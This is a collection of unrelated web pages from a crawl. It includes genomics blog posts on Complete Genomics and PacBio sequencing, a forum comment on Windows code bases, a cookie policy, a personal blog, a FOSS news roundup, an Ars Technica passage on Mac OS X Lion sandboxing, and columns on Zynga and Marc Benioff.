After yesterday's talk, where I missed the first half of the technology that Complete Genomics is working on, I had a LOT of questions, and a significant amount of doubt about how things would play out with their business model. In fact, I would say I didn't understand either particularly well. The technology itself is interesting, mainly because of the completely different approach to generating long reads... which also explains the business model, in some respects. Instead of developing a better way to "skin the cat", as they say, they went with a strategy where the idea is to tag and assemble short reads. That is to say, their read size for an individual read is in the range of a 36-mer, but it's really irrelevant, because they can figure out which sequences are contiguous. (At least, as I understood the technology.) Ok, so high reliability short reads with an ability to align using various clues is a neat concept.
If you're wondering why that explains their business model, it's because I think that the technique is a much more difficult pipeline to implement than any of the other sequencing suppliers demand. Of course, I'm sure that's not the only reason - the reason why they'll be competitive is the low cost of the technology, which only happens when they do all the sequencing for you. If they had to box reagents and ship it out, I can't imagine that it would be significantly cheaper than any of the other setups, and it would probably be much more difficult to work with. That said, I imagine that in their hands, the technology can do some pretty amazing things. I'm very impressed with the concept of phasing whole chromosomes (they're not there yet, but eventually they will be, I'm sure), and the nifty way they're using a hybridization-based technique to do their sequencing. Unlike the SOLiD, it's based on longer fragments, which answers some of the (really geeky, but probably uninformed) thermal questions that I had always wondered about with the SOLiD platform. (Have you ever calculated the binding energy of a 2-mer? It's less than room temperature.) Of course the cell manages to incorporate single bases (as does Pacific Biosciences), but that uses a different mechanism.
Just to wrap up the technology, someone left an anonymous comment the other day that they need a good ligase, and I checked into that. Actually, they really don't need one. They don't use an extension-based method, which is really the advantage (and Achilles heel of the method), which means they get highly reliable reads (and VERY short fragments, which they have to then process back to their 36- to 40-ish-mers). Alright, so just to touch on the last point of their business model, I was extremely skeptical when I heard they were going to only sequence human genomes, which is a byproduct of their scale/cost model approach. To me, this meant that any of the large sequencing centres would probably not become customers - they'll be forced to do their own sequencing anyhow for other species, so why would they treat humans any differently? What about cell lines, are they human enough?... Which left, in my mind, hospitals.
Hospitals, I could see buying into this - whoever supplies the best and least expensive medical diagnostics kit will obviously win this game and get their services, but that wouldn't be enough to make this a Google-sized or even Microsoft-sized company. But it would probably be enough to make them a respected company like MDS Metro or other medical service providers. Will their investors be happy with that... I have no idea. On the other hand, I forgot pharma. If drug companies start moving this way, it could be a very large segment of their business. (Again, if it's inexpensive enough.) Think of all the medical trials, disease discovery and drug discovery programs... and then I can start seeing this taking off. Will researchers ever buy in? That, I don't know. I certainly don't see a genome science centre relinquishing control over their in-house technology, much like asking Microsoft to outsource its IT division. Plausible... but I wouldn't count on it.
So, in the end, all I can say is that I'm looking forward to seeing where this is going... I don't see this concept disappearing any time soon, and, as it stands, there's room for more competition in the sequencing field. The next round of consolidation isn't due for another two years or so. So... Good luck! May the "best" sequencer win.
Labels: Corporate Profile, new technology
posted by Anthony Fejes at 2/06/2009 09:55:00 AM 0 Comments
Knols
A strange title, no? I just discovered Google's Knol project. Imagine an author-accountable version of Wikipedia. That's quite the concept. It's like a free encyclopedia, written by experts, where the experts make money by putting Google ads on their pages (optional), and the encyclopedia itself is free. I can't help but like this concept.
This, to me, is about the influence of Open Source on business models other than software. People used to claim, back in the 90's, that the internet would eventually become nothing but ads, because no one in their right mind will contribute content for free, and content generation would become the exclusive domain of major companies. That was the old thinking, which led to the "subscription models" favoured by companies like online subscription-based dictionaries, and subscription-based expert advice, both of which I find lacking in so many respects.
Subsequently, people began to shift in the other direction, where it was assumed that services could harness the vast power of the millions of online people. If each one contributed something to Wikipedia, we'd have a mighty resource. Of course, they forgot the chaotic nature of society. There are always a bunch of idiots to ruin every party.
So where does this leave us? With Knol! This model is vastly more like the way software is created in the Open Source model. The Linux kernel is edited by thousands of people, creating an excellent software platform, and it's not by letting just anyone edit the software. Many people create suggestions for new patches, and the best (or most useful, or most easily maintained...) are accepted. Everyone is accountable along the way, and the source of every patch is recorded. If you want to add something to the Linux kernel, you'd better know your stuff, and be able to demonstrate you do. I think the same thing goes for Knol. If you want to create a page, fine, but you'll be accountable for it, and your identity will be used to judge the validity of the page. If an anonymous person wants to edit it, great, that's not a problem, but the page maintainer will have to agree to those changes. This is a decentralized, expert-based system, fueled by volunteers and self-sponsored (via the Google ads) content providers. It's a fantastic starting point for a new type of business model.
Anyhow, I have concerns about this model, as I would about any new product. What if someone hijacks a page or "squats" on it? I could register the page for "Coca-Cola" and write an article on it and become the de-facto expert on something that has commercial value. Ouch.
That said, I started my first Knol article on ChIP-Seq. If anyone is interested in joining in, let me know. There's always room for collaboration on this project.
Cheers!
Labels: new technology
Synthetic genomes
A nifty announcement this morning pre-empted my transcriptome post:
Scientists at the J. Craig Venter Institute have succeeded in creating a fully synthetic bacterial genome, which they have named Mycoplasma genitalium JCVI-1.0. This DNA structure is the largest man-made molecule in existence, measuring 582,970 base pairs.
Kind of neat, really. Unfortunately, I think it's putting the cart before the horse. We don't understand 95% of what's actually going on in the genome, so making an artificial genome is more like having a Finnish person making a copy of the English dictionary by leaving out random words (just one or two), and then seeing if Englishmen can still have a decent conversation with what he's left them. When he finds that leaving out two words still results in a reasonable discussion on toothpaste, he declares he's created a new Dialect.
Still, it's an engineering feat to build a genome from scratch, much like the UBC engineers hanging VW bugs off of bridges. Pointless and incomprehensible, but neat.
Labels: new technology
Pacific Biotech new sequencing technology
I have some breaking news. I doubt I'm the first to blog this, but I find it absolutely amazing, so I had to share.
Steve Turner from Pacific Biosciences (PacBio) just gave the final talk of the AGBT session, and it was damn impressive. They have a completely new method of doing sequencing that uses DNA polymerase as a sequencing engine. Most impressively, they've completed their proof of concept, and they presented data from it in the session.
The method is called Single Molecule Real Time (SMRT) sequencing. It's capable of producing 5000-25,000 base pair reads, at a rate of 10 bases/second. (They apparently have 25bps techniques in development, and expect to release when they have 50bps working!) The machinery has zero moving parts, and once everything is in place, they anticipate that they'll have a sequencing rate of greater than 100 Gb per hour! As they are proud to mention, that's about a full draft genome for a human being in 15 minutes, and at a cost of about $100. Holy crap!
Labels: Bioinformatics, new technology, Pacific Biosciences, Sequencing, SMRT
Name: Anthony Fejes. Location: Vancouver, British Columbia, Canada.
Anthony's new blog can be found at http://blogs.nature.com/fejes
While writing this blog, Anthony was a PhD Candidate at the University of British Columbia working at the BC Cancer Agency's Genome Sciences Centre. His area of interest is in second generation sequencing applications and bioinformatics algorithm development.
Thoughts on 'MinWin', Windows 7, and Virtualisation
Linked by Thom Holwerda on Mon 22nd Oct 2007 13:48 UTC
Earlier today, OSNews ran a story on a presentation held by Microsoft's Eric Traut, the man responsible for the 200 or so kernel and virtualisation engineers working at the company. Eric Traut is also the man who wrote the binary translation engine for the earlier PowerPC versions of VirtualPC (interestingly, this engine is now used to run XBox 1 [x86] games on the XBox 360 [PowerPC]) - in other words, he knows what he is talking about when it comes to kernel engineering and virtualisation. His presentation was a very interesting thing to watch, and it offered a little bit more insight into Windows 7, the codename for the successor to Windows Vista, planned for 2010.
RE: This isnt new - by TemporalBeing on Mon 22nd Oct 2007 15:40 UTC, in reply to "This isnt new"
Quote: "Windows isnt dead it just needs a major garbage cleaning, you don't throw out code that works. XP was one of the best OS's in history especially since SP2."
The XP code base seemed to work. But it was really a delinquent code base that needs a lot of work, and a lot of legacy crap dropped from it. The author has a good approach for how to do so while still maintaining the backwards compatibility, and it would behoove Microsoft to actually do it. As to throwing out a code base - yes, there are times when you do throw out a code base. Typically, it is when you can no longer control the code. Sure, you might be using CVS or SVN or something similar, but that doesn't mean you can truly 100% control the code. For instance, I worked on one project where the code base was really uncontrollable. It had a legacy history to it and we couldn't solve the problems it had by continuing to use that code base. The only answer was to start afresh - use new practices so that we could manage the resources of the code, ensure security, etc. The old code base, while it worked, wouldn't have supported those efforts. Moreover, the new code base allowed us to add in new features quickly, easily, and maintainably. (When we fixed or added a new feature to the old code base, we would end up with more issues coming out than we went in with. It was really bad.) The Windows code base is likely at that point. It was likely there before XP, and only made worse by XP. It's easy to tell when you're at that point, as every new change takes longer to get in and keep the old code functional. So yes, it's high time Microsoft cut the cruft and started a new code base, and designed the code base to be more modular, maintainable, secure, etc. It's the only way the software will survive another generation (e.g. Windows 7 and Windows 8). Otherwise, it will collapse under its own weight.
2015-48/3681/en_head.json.gz/14339 | Help Smilies
This page discusses how cookies are used by this site. If you continue to use this site, you are consenting to our use of cookies.
What Cookies Are
Cookies are small files stored on your computer by your web browser (such as Internet Explorer or Firefox) at the request of a site you're viewing. This allows the site you're viewing to remember things about you, such as your preferences and history or to keep you logged in.
Cookies may be stored on your computer for a short time (such as only while your browser is open) or for an extended period of time, even years. Cookies not set by this site will not be accessible to us.
Our Cookie Usage
This site uses cookies for numerous things, including:
Registration and maintaining your preferences. This includes ensuring that you can stay logged in and keeping the site in the language or appearance that you requested.
Analytics. This allows us to determine how people are using the site and improve it.
Advertising cookies (possibly third-party). If this site displays advertising, cookies may be set by the advertisers to determine who has viewed an ad or similar things. These cookies may be set by third parties, in which case this site has no ability to read or write these cookies.
Other third-party cookies for things like Facebook or Twitter sharing. These cookies will generally be set by the third-party independently, so this site will have no ability to access them.
Removing/Disabling Cookies
Managing your cookies and cookie preferences must be done from within your browser's options/preferences. Here is a list of guides on how to do this for popular browser software: | 计算机 |
2015-48/3681/en_head.json.gz/14753 | Constantin's Blooog
Useful stuff for your blog-reading pleasure.
7 Things You May (or May Not) Know About Me
By user13366078 on Jan 23, 2009
I recently got hit by a blogger virus Ponzi scheme meme tradition where you get to write about yourself while blaming others for it (thanks, Tim!). Well, I haven't blogged much about myself and I still owe you, dear reader, an "About me" article, but this blog is meant to be useful, not self-serving so you'll have to do with these seven pieces of useless information for now. I used to be a nomad as a kid. My mom worked for the German department of foreign affairs which usually meant that every 4 years or so we would move to a different country. That's why she met my dad in Santiago de Chile and so the secret of my not so German last name "Gonzalez" is finally revealed. Despite all of that, I was born in Bonn, the former capital of Germany, we moved to Switzerland for a bit, I spent my kindergarten years in Bogotá (Colombia) (my brother was born there in 1975 and he can claim Columbian nationality by birthright, cool). I actually picked up Spanish as my first language with only little German (everybody including the TV was speaking Spanish so why should I have listened to my Mom?). From there we moved to Istanbul (Turkey) where I finally learned German (yep, there's a German school there) but halfway through the term, there was a minor terrorist bomb attack on my elementary school (I hardly noticed, really) so my parents had enough of foreign countries for a while and we moved back to Bonn around 1978. I spent most of my school time in Germany until we moved to Rome (Italy) after grade 9 (1986-ish). After finishing school, I went to Clausthal (Germany) (yes, quite a culture shock) to study computer-science while my parents and my brother continued to Lisbon (Portugal), Bonn (Germany, again), then Barcelona (Spain). Now I've been living in Munich for more than 10 years, so I call this "home" at the moment. My wife and I spent our honeymoon in Chile, exploring my roots and I'm sure I'll go there again, someday... As a student, I was CEO of a pub for a year. The pub is called the "Kellerclub" and it still exists :). You know how it goes: Your favourite student pub is actually a nonprofit organization for tax purposes so we could serve beer at the lowest prices in town. Any nonprofit needs to have a board of directors of at least three people and that night in, hmm 1992?, anyway, that night when they had to elect a new board, I volunteered together with two others and strangely noone else volunteered so the three of us got to run the pub for a year (in Germany, a nonprofit board has to have at least three members). While the other two members had to deal with financial bookeeping, booking the bands, etc., I mostly had to deal with legal issues (we got exorbitant high fees for social security for all the bands we booked over the last 5 years to deal with), fundraising (we needed new speakers) and trying to keep the bartenders under control so they don't drink more than they earn or close later than the police would let us. Oh, and keeping the school kids out of the club was always an issue, too... But it was fun and we learned more about real life than what the university could have taught us, especially during night after night of bartendering with all kinds of weird guests. Tim blogged about playing around with mod files in his "7 things" entry, which reminds me of the good old homecomputer times. My first computer was a Dragon 32 which turned out to be a clone of the Radio Shack TRS 80 Color Computer. 
Back then, it wasn't as popular as the Commodore 64, but it had the better OS (read: More commands in its Basic interpreter). That didn't count much, because the C64 had the better games so I upgraded to a Commodore 128d after a few years. Those were the golden times of the SID sound chip and my friends and I spent hours, days, weeks and months listening to cool video game music (and of course playing those videogames, too) and watching breathtaking demos from the demoscene. Back then, you could know everything about your computer, including machine language, hardware registers (there were no "drivers" back then :) ) and the full specs (and undocumented features) of all of the chips inside your computer. I'd loved to program my own music, but somehow my musical talents were limited, and so I spent my time ripping music from games and figuring out how they worked. Then, the Amiga came and I earned my Amiga 500 by teaching my mom's staff how to use a word processor (they shipped PCs with Microsoft Word to the embassy where she worked, but did only one week of training for everything to a staff that never saw a computer before). The Amiga beat the PC world hands down in every category of coolness from audio to graphics to operating system features (multitasking, baby!) for years and of course its sound capabilities were more advanced (it had a real multi-channel sample player), but the SID had that analog touch that the digital world never could quite replicate that well back then. Just when the Amiga times were over (I owned an Amiga 4000 running NetBSD) and the PC won, I was saved from having to buy my first PC by deciding to play on a Sony Playstation console and working on an Apple Newton instead, which both outclocked all the PCs in my neighborhood by a wide margin :). I still want to create music, but hardly find the time. I've played around with keyboards, but mostly preferred programming music using several software tools, such as Logic Pro. My biggest achievement so far is the intro music to the HELDENFunk podcast which I help create on a regular basis. It's not much, but at it doesn't seem to be bad either. At least noone has decided to replace it with a better tune yet :). I secretly wanted to become a drummer when I went to university, an ambition that was unexpectedly reignited during CEC 2008 when Glenn, Bob (?), Ted and I founded "They call me Ted" while playing Rockband in between CEC lectures. Our "band" reached the CEC 2008 highscore. We didn't win the final round (because none of us knew the song we were supposed to play), but we'll be back in 2009 and I'm now playing drums in Guitar Hero World Tour whenever I find the time as a practice. Back to real music: I'll start playing with Logic Pro again, this time trying to create a full song. And then there's the Korg Kaossilator which seems to be really cool, or perhaps I'll finally learn a real instrument like an electric guitar... Who knows? During university times, I worked at the local cinema as a projectionist. Our projection room (to the right) looked remarkably similar to this photo from the Wikipedia article on projectionists. Back then, a projectionist had to do real work, such as splicing together 6 rolls of film (coming in boxes, no reels) into two reels (about one hour each) and manage the transition from one projector to the next during the show without the audience noticing too much. 
Of course a film would rip in the middle of the movie more often than not and then you had to run back to the projection room very quickly unless you wanted to spend the rest of the night trying to wind half a mile of film back onto the reel. I still keep a piece of film in my wallet as a lucky charm and occasionally I pull it out to show how the Dolby Pro-Logic, Dolby Digital, DTS and SDDS sound systems work on film. Today, I like tweaking my home cinema to get good audio and video quality and it's sad to see how bad the quality of cinemas have become as they spend less and less in getting image and audio quality right. In the mid nineties, I ran my university's web server www.tu-clausthal.de and in 1997, I got hired by Sun to run the ARD webserver, (ARD is the biggest German public TV network), which back then was sponsored by Sun. I still was a student and I did it as a contractor for Sun, but that gave me a nice topic for my master thesis, a motivation to finish my studies and start working as an SE for Sun in 1998. I like to make up funny, useless words. They just pop into my mind and I end up using them for stuff. Think something like "Gadonga". When my daughter Amanda was born, we said she looked like a cute little "Maus" (mouse in German). Well, the Spanish female diminuitive ending is "-ita", so we often call her now "Mausita". I hope she won't hate me for this when she reaches her teen age :). Well, I hope this was not too boring, and I now get to tag 7 other people: Rolf (@rolfk), who is currently enjoying Wall Street Journal fame, Chaosblog (@ | 计算机 |
2015-48/3681/en_head.json.gz/14795 | Archive for the ‘Operating System U’ Category Looking out over the horizon
Larry 3 comments
The last couple of weeks have been filled with resume-sending, waiting by the phone for the resumes to do their trick, and a trip to Arizona for a plethora of family reasons (wife went to do some New Age thing in Sedona while daughter visited friends in Phoenix — heck, I even got a phone interview with a tech company there). But while I was driving around the Southwest, a few things crossed the proverbial radar that deserve special mention, like . . .
Congratulate me, I’m an “extremist”: And give yourself a good pat on the back, too, because if you’re a Linux Journal reader, the NSA thinks you are an “extremist,” too. Kyle Rankin reports on the site on the eve of Independence Day — irony much? — that the publication’s readers are flagged for increased surveillance. That includes — oh, I don’t know — just about everyone involved to some degree with Free/Open Source Software and Linux (and yes, Richard Stallman, that would also include GNU/Linux, too), from the noob who looked up “network security” to the most seasoned greybeard.
Rankin writes, “One of the biggest questions these new revelations raise is why. Up until this point, I would imagine most Linux Journal readers had considered the NSA revelations as troubling but figured the NSA would never be interested in them personally. Now we know that just visiting this site makes you a target. While we may never know for sure what it is about Linux Journal in particular, the Boing Boing article speculates that it might be to separate out people on the Internet who know how to be private from those who don’t so it can capture communications from everyone with privacy know-how.”
So, a quick note to our friends in the main office of the NSA in Maryland, where someone has drawn the unfortunate assignment of reading this (my apologies for not being a more exciting “extremist”) because . . . well, you know . . . I’m an “extremist” using Linux. Please pass this run-on sentence up your chain of command: “The right of the people to be secure in their persons, houses, papers, and effects, against unreasonable searches and seizures, shall not be violated, and no Warrants shall issue, but upon probable cause, supported by Oath or affirmation, and particularly describing the place to be searched, and the persons or things to be seized.”
That’s the Fourth Amendment to the United States Constitution, in case you hadn’t noticed.
One more thing: Linux Journal webmaster Katherine Druckman (sorry, the term “webmistress,” as noted on the LJ site, needs to be thrown into the dustbin of history) says that, yeah, maybe readers are a little extreme and asks readers to join them in supporting “extremist” causes like Free/Open Source Software and hardware, online freedom, and the dissemination of helpful technical knowledge by adding the graphic featured above (it comes in red, black, or white) to your site, your social media, or wherever you deem fit.
On a more positive note . . .
Introducing Xiki: Command-line snobs, welcome to the future. In a Linux.com article, Carla Schroder introduces Xiki, an interactive and flexible command shell 10 years in the making. It’s a giant leap forward in dealing with what some consider the “black magic” of the command line, but Carla points out another, more significant, use for the software.
Carla writes, “When I started playing with Xiki it quickly became clear that it has huge potential as an interface for assistive devices such as Braille keyboards, wearable devices like high-tech glasses and gloves, prosthetics, and speech-to-text/text-to-speech engines, because Xiki seamlessly bridges the gap between machine-readable plain text and GUI functions.”
It could be the next big thing in FOSS and deserves a look.
Another day, another distro: Phoronix reported last week a peculiar development which either can be considered yet another Linux distro on the horizon or a bad joke. According to the article, Operating System U is the new distro and the team there wants to create “the ultimate operating system.” To do that, the article continues, the distro will be based on Arch with a modified version of the MATE desktop and will use — wait for it — Wayland (putting aside for a moment that MATE doesn’t have Wayland support, but never mind that). But wait, there’s more: Operating System U also plans to modify the MATE Desktop to make it better while also developing a new component they call Startlight, which pairs the Windows Start Button with Apple’s Spotlight.
The team plans a Kickstarter campaign later this month in an attempt to raise $150,000. A noble effort or reinventing the wheel? I’d go with the latter. Our friends at Canonical have dumped a ton of Mark Shuttleworth’s money into trying to crack the desktop barrier and, at this point, they have given up to follow other form factors. Add to this an already crowded field of completely adequate and useable desktop Linux distros that would easily do what Operating System U sets out to do, and you have to wonder about the point of this exercise.
Additionally, for a team portraying itself to be so committed to open source, there seems to be a disconnect of sorts around what community engagement entails. A telling comment in the article is posted by flexiondotorg — and if it’s the person who owns that site, it’s Martin Wimpress of Hamshire, England, an Arch Linux Trusted User, a member of the MATE Desktop team, a GSoC 2014 mentor for openSUSE and one of the Ubuntu MATE Remix developers. Martin/flexiondotorg says this: “I have a unique point of view on this. I am an Arch Linux TU and MATE developer. I am also the maintainer for MATE on Arch Linux and the maintainer for Ubuntu MATE Remix.
“None of the indivuals involved with Operating System U have approached Arch or MATE, nor contributed to either project, as far as I can tell. I’d also like to highlight that we (the MATE team) have not completed adding support for GTK3 to MATE, although that is a roadmap item due for completion in MATE 1.10 and a precursor to adding Wayland support.
“I can only imagine that the Operating System U team are about to submit some massive pull-requests to the MATE project what with the ‘CEO’ proclaiming to be such an Open Source enthusiast. If Operating System U are to be taken seriously I’d like to see some proper community engagement first.”
Proper community engagement — what a concept! This blog, and all other blogs by Larry the Free Software Guy, Larry the CrunchBang Guy, Fosstafarian, Larry the Korora Guy, and Larry Cafiero, are licensed under the Creative Commons Attribution-NonCommercial-NoDerivs CC BY-NC-ND license. In short, this license allows others to download this work and share it with others as long as they credit me as the author, but others can’t change it in any way or use it commercially.
Categories: free software, linux, Linux, Linux Journal, Mark Shuttleworth, open source, Operating System U, Phoronix, Ubuntu, Xiki
Tags: linux, Linux Journal, Mark Shuttleworth, NSA, open source, Phoronix, Ubuntu
Blog at WordPress.com. The INove Theme. Larry the Free Software Guy Blog at WordPress.com. The INove Theme. Follow | 计算机 |
2015-48/3682/en_head.json.gz/37 | Mac OS X 10.7 Lion: the Ars Technica review
Lion is no shrinking violet.
by John Siracusa
The previous release of Mac OS X focused on internal changes. My review did the same, covering compiler features, programming language extensions, new libraries, and other details that were mostly invisible to end-users.
Lion is most definitely not an internals-focused release, but it's also big enough that it has its share of important changes to the core OS accompanying its more obvious user-visible changes. If this is your first time reading an Ars Technica review of Mac OS X and you've made it this far, be warned: this section will be even more esoteric than the ones you've already read. If you just want to see more screenshots of new or changed applications, feel free to skip ahead to the next section. We nerds won't think any less of you.
Apple's approach to security has always been a bit unorthodox. Microsoft has spent the last several years making security a top priority for Windows, and has done so in a very public way. Today, Windows 7 is considered vastly more secure than its widely exploited ancestor, Windows XP. And despite the fact that Microsoft now distributes its own virus/malware protection software, a burgeoning market still exists for third-party antivirus software.
Meanwhile, on the Mac, Apple has only very recently added some basic malware protection to Mac OS X, and it did so quietly. Updates have been similarly quiet, giving the impression that Apple will only talk about viruses and malware if asked a direct question about a specific, real piece of malicious software.
This approach is typical of Apple: don't say anything until you have something meaningful to say. But it can be maddening to security experts and journalists alike. As for end-users, well, until there is a security problem that affects more than a tiny minority of Mac users, it's hard to find an example of how Apple's policies and practices have failed to protect Mac users at least as well as Microsoft protects Windows users.
Sandboxing
Just because Apple is quiet, that doesn't mean it hasn't been taking real steps to improve security on the Mac. In Leopard, Apple added a basic form of sandboxing to the kernel. Many of the daemon processes that make Mac OS X work are running within sandboxes in Snow Leopard. Again, this was done with little fanfare.
Running an application inside a sandbox is meant to minimize the damage that could be caused if that application is compromised by a piece of malware. A sandboxed application voluntarily surrenders the ability to do many things that a normal process run by the same user could do. For example, a normal application run by a user has the ability to delete every single file owned by that user. Obviously, a well-behaved application will not do this. But if an application becomes compromised, it may be coerced into doing something destructive.
In Lion, the sandbox security model has been greatly enhanced, and Apple is finally promoting it for use by third-party applications. A sandboxed application must now include a list of "entitlements" describing exactly what resources it needs in order to do its job. Lion supports about 30 different entitlements which range from basic things like the ability to create a network connection or to listen for incoming network connections (two separate entitlements) to sophisticated tasks like capturing video or still images from a built-in camera.
It might seem like any nontrivial document-based Mac application will, at the very least, need to declare an entitlement that will allow it to both read from and write to any directory owned by the current user. After all, how else would the user open and save documents? And if that's the case, wouldn't that entirely defeat the purpose of sandboxing?
Apple has chosen to solve this problem by providing heightened permissions to a particular class of actions: those explicitly initiated by the user. Lion includes a trusted daemon process called Powerbox (pboxd) whose job is to present and control open/save dialog boxes on behalf of sandboxed applications. After the user selects a file or directory into which a file should be saved, Powerbox pokes a hole in the application sandbox that allows it to perform the specific action.
A similar mechanism is used to allow access to recently opened files in the "Open Recent" menu, to restore previously open documents when an application is relaunched, to handle drag and drop, and so on. The goal is to prevent applications from having to request entitlements that allow it to read and write arbitrary files. Oh, and in case it doesn't go without saying, all sandboxed applications must be signed.
Here are a few examples of sandboxed processes in Lion, shown in the Activity Monitor application with the new "Sandbox" column visible:
Sandboxed processes in Lion
Earlier, the Mac App Store was suggested as a way Apple might expedite the adoption of new Lion technologies. In the case of sandboxing, that has already happened. Apple has decreed that all applications submitted to the Mac App Store must be sandboxed, starting in November.
Privilege separation
One limitation of sandboxing is that entitlements apply to an entire process. A sandboxed application must therefore possess the superset of all entitlements required for each feature it provides. As we've seen, the use of the Powerbox daemon process prevents applications from requiring arbitrary access to the file system by delegating those entitlements to another, external process. This is a specific case of the general principle called privilege separation.
The idea is to break up a complex application into individual processes, each of which requires only the few entitlements necessary to perform a specific subset of the application's total capabilities. For example, consider an application that needs to play video. Decoding video is a complex and performance-sensitive process which has historically led to inadequate protection against buffer overflows and other security problems. An application that needs to display video will likely do so using libraries provided by the system, which means that there's not much a third-party developer can do to patch vulnerabilities where they occur.
What a developer can do instead is isolate the video decoding task in its own process with severely reduced privileges. A process that's decoding video probably doesn't need any access to the file system, the network, the built-in camera and microphone, and so on. It just needs to accept a stream of bytes from its parent process (which, in turn, probably used Powerbox to gain the ability to read those bytes from disk in the first place) and return a stream of decoded bytes. Beyond this simple connection to its parent, the decoder can be completely walled off from the rest of the system. Now, if an exploit is found in a video codec, a malicious hacker will find himself in control of a process with so few privileges that there is little harm it can do to the system or the user's data.
Though this was just an example, the QuickTime Player application in Lion does, in fact, delegate video decoding to an external, sandboxed, extremely low-privileged process called VTDecoderXPCService.
QuickTime Player with its accompanying sandboxed video decoder process
Another example from Lion is the Preview application, which completely isolates the PDF parsing code (another historic source of exploits) from all access to the file system.
Putting aside the security advantages of this approach for a moment, managing and communicating with external processes is kind of a pain for developers. It's certainly less convenient than the traditional approach, with all code within a single executable and no functionality more than a function call away.
Once again in Lion, Apple has provided a new set of APIs to encourage the adoption of what it considers to be a best practice. The XPC Services framework is used to manage and communicate with these external processes. XPC Service executables are contained within an application's bundle. There is no installation process, and they are never copied or moved. They must also be part of the application's cryptographic signature in order to prevent tampering.
The XPC Service framework will launch an appropriate external process on demand, track its activity, and decide when to terminate the process after its job is done. Communication is bidirectional and asynchronous, with FIFO message delivery, and the default XPC process environment is extremely restrictive. It does not inherit the parent process's sandbox entitlements, Keychain credentials, or any other privileges.
The reward for breaking up an application into a collection of least-privileged pieces is not just increased security. It also means that a crash in one of these external processes will not take down the entire application.
We've seen this kind of privilege separation used to great effect in recent years by Web browsers on several different platforms, including Safari on Mac OS X. Lion aims to extend these advantages to all applications. It also makes Safari's privilege separation even more granular.
Safari in Lion is based on WebKit2, the latest and greatest iteration of the browser engine that powers Safari, Chrome, and several other desktop and mobile browsers. Safari in Snow Leopard already separated browser plug-ins such as Flash into their own processes. (Adobe should not consider this an insult; Apple does the same with its own QuickTime browser plug-in.) As if to further that point, WebKit2 separates the entire webpage rendering task into an external process. The number of excuses for the Safari application to crash is rapidly decreasing.
As the WebKit2 website notes, Google's Chrome browser uses a similar approach to isolate WebKit (version 1) from the rest of the application. WebKit2 builds the separation directly into the framework itself, allowing all WebKit2 clients to take advantage of it without requiring the custom code that Google had to write for Chrome. (Check out the process architecture diagrams at the WebKit2 site for more detailed comparisons with pre-Lion WebKit on Mac OS X and Chrome's use of WebKit.)
Page: 1 2 ... 8 9 10 ... 18 19 Next → Reader comments 401
John Siracusa / John Siracusa has a B.S. in Computer Engineering from Boston University. He has been a Mac user since 1984, a Unix geek since 1993, and is a professional web developer and freelance technology writer.
@siracusa on Twitter | 计算机 |
2015-48/3682/en_head.json.gz/270 | Zynga and Fundamental Problems with their Social Network Games by Lewis Pulsipher on 09/16/12 09:06:00 am Post A Comment
As you probably know, Zynga's stock is priced far below its IPO cost, and many executives are leaving the company.� It's not like they're losing money, but they're losing mind-share rapidly.� Will Zynga be able to turn around this trend?Zynga's fundamental problem may be the fundamental characteristic of the video game industry as a whole: video games are designed to be played for a while and then discarded.� You "beat the game" or you learn the story, or you get tired of "the grind", because there's an emphasis on the destination, not on the journey.Good board and card games are played over and over again, over the course of many years.� I know people who have played my five hour board game Britannia five hundred times, and undoubtedly there are other board and card games of similar longevity.� I may have played the tabletop RPG D&D that many hours.� Video games do not match that, though MMOs can approach it.� But social network games are nothing like MMOs.Inevitably, in a video game that more or less constantly asks you for money, that builds in frustration so that you'll spend money to stop being frustrated, the player will get tired of the game and quit playing.� And when the next game is practically just like the last (as is typical of Zynga Facebook games), the player is going to get tired of the next one that much sooner.Yet Zynga is so big, every incentive is to avoid risk, hence the games are the same over and over again.� Because they still draw millions of players, it's just the same group over and over again.� But that group may be getting smaller.Traditional arcade games were so hard you couldn't beat them, so many players kept going until they could no longer improve.� But this is a new century, people don't want hard games, they want entertainment and time-killing and playgrounds, so social network games are stupendously easy to play.� They are mass-market games, a completely different "kettle of fish".� Contrast Zynga's big-company low-risk mentality with King.com's small teams churning out games every 3 months for online trials.� Then they turn the most successful into social networking games.The following explains the key to making really good games: ��� . . . Just Cause 2 developer explains that while most developers produce downloadable content to prolong user engagement, the real trick to long-term success is to make a game that players don't want to put down in the first place.��� ��� "We create a game allowing players to properly explore and have fun and not focusing so much on the actual end goal of the game," he says. In other words, make a game where people enjoy the journey, not just the destination.**My book “Game Design: How to Create Video and Tabletop Games, Start to Finish" is now available from mcfarlandpub.com or Amazon.�� I am @lewpuls on Twitter.� (I average much less than one post a day, almost always about games, not about other topics.)� Web: http://pulsiphergames.com/
/blogs/LewisPulsipher/20120916/177798/Zynga_and_Fundamental_Problems_with_their_Social_Network_Games.php | 计算机 |
2015-48/3682/en_head.json.gz/989 | The Man Who Moved a Paradigm
An evaluation of the changes wrought by Salesforce.com's Marc Benioff.
By Denis Pombriant
For the rest of the November 2009 issue of CRM magazine please click here
I think we have enough data to call this one: Marc Benioff should go down in history — or at least the history of the software industry — for his nearly single-handed invention of on-demand computing. There are numerous others who could at least plausibly lay claim to that achievement, many with stronger technology credentials and some (including Larry Ellison himself) who worked, as Benioff did, at Oracle. But Benioff’s contribution goes much deeper than any of the others’ because he was the one who knew, or figured out, how to change the software market’s paradigm.If changing a paradigm were easy, we’d already have universal healthcare and electric cars would’ve been a hit. But changing a paradigm is hard: You have to scrape one idea out of the minds of millions of people and replace it with your idea — and you have only the existing tools to do that with. Yet Benioff accomplished the feat with apparent ease. It’s already difficult for many of us to recall how entrenched the software industry was before Salesforce.com. There simply was no other way to deliver software back then, and few of us could imagine any alternative to buying a license, installing it, and hoping for the best. Multiple operating systems, databases, middleware — the hat trick of modern computing was to get all those planets to align. Then you needed to have the applications actually do something that could improve your productivity. Oh, and did I mention the cost?Forgive me if I sound a little too much like a fan but I believe it’s reasonable to place Benioff in the pantheon that includes Henry Ford and possibly (though he resides on a higher plane) Thomas Edison. Ford and Edison did some amazing things but each had the relative advantage of starting with a clean slate. There were virtually no assembly lines before Ford, and no one before Edison had seriously considered how wonderful the world would be with recorded music, electric light, or motion pictures.A shift of such magnitude requires a moment of crisis, one that provides a catalyst to change people’s minds, to reverse the inclination to say “If it ain’t broke….” Benioff found the broken part of the software industry, held it up for all to see, and never let us forget that it was broken.
